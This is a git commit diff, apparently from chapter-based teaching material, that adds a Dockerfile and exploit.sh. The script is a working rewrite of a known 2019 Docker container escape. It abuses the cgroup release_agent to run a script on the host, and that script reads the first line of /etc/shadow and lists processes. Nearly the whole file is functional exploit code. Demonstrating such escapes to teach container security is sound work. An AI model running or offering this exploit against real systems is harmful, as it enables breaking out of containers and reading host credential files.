Initial commit

2022-01-08 17:41:12 +01:00
commit 12a5ea3132
30 changed files with 267 additions and 0 deletions
--- a/kapitel15/Dockerfile
+++ b/kapitel15/Dockerfile
@@ -0,0 +1,4 @@
+FROM debian:11-slim
+RUN useradd -m -s /bin/bash --user-group kalle
+USER kalle
+WORKDIR /home/kalle
--- a/kapitel15/exploit.sh
+++ b/kapitel15/exploit.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+# This is a re-write of Felix Wilhelms exploit from 2019.
+# The original Tweet (and code) can be found at:
+# https://twitter.com/_fel1x/status/1151487051986087936
+rdma=/sys/fs/cgroup/rdma
+mkdir -p $rdma/w
+echo 1 >$rdma/w/notify_on_release
+upperdir=`sed -rn 's/.*upperdir=([^,]*).*/\1/p' /etc/mtab`
+echo $upperdir/cmd > $rdma/release_agent
+echo '#!/bin/sh' > /cmd;
+echo "head -n 1 /etc/shadow > $upperdir/utdata" >> /cmd
+echo "ps >> $upperdir/utdata" >> /cmd
+chmod +x /cmd
+/bin/bash -c "echo 0 > $rdma/w/cgroup.procs"
+sleep 3
+cat /utdata